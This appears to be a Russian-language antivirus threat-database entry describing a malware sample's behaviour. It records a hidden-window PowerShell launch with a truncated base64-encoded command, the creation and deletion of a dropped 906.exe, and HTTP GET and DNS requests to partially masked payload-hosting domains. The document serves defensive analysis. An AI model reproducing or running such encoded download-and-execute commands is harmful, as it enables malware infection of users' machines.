Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABOAGEAaAB4AGIAegB4AG0AbgBzAG0AYgA9ACcARwBiAG0AZABuAG0AZwBoAG4AJwA7ACQAUQBzAGgAaAB0AGwAbgBpAG0AYQBjACAAPQAgACcAOQAwADYAJwA7ACQASgBsAGwAeABpAHkAcwB2AGgAcAA9ACcAUwBiAHAAYgBkAGEAdgB...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\906.exe
Удаляет следующие файлы
- %HOMEPATH%\906.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://www.bl###ream.al/calendar/r83g9/
- http://my####thanhbinh.net/wp-content/uploads/qDq/
- http://www.mj####anical.com/wp-includes/ddy/
UDP
- DNS ASK bl###ream.al
- DNS ASK my####thanhbinh.net
- DNS ASK sf##c.biz
- DNS ASK co###print.net
- DNS ASK mj####anical.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABOAGEAaAB4AGIAegB4AG0AbgBzAG0AYgA9ACcARwBiAG0AZABuAG0AZwBoAG4AJwA7ACQAUQBzAGgAaAB0AGwAbgBpAG0AYQBjACAAPQAgACcAOQAwADYAJwA7ACQASgBsAGwAeABpAHkAcwB2AGgAcAA9ACcAUwBiAHAAYgBkAGEAdgB...' (со скрытым окном)
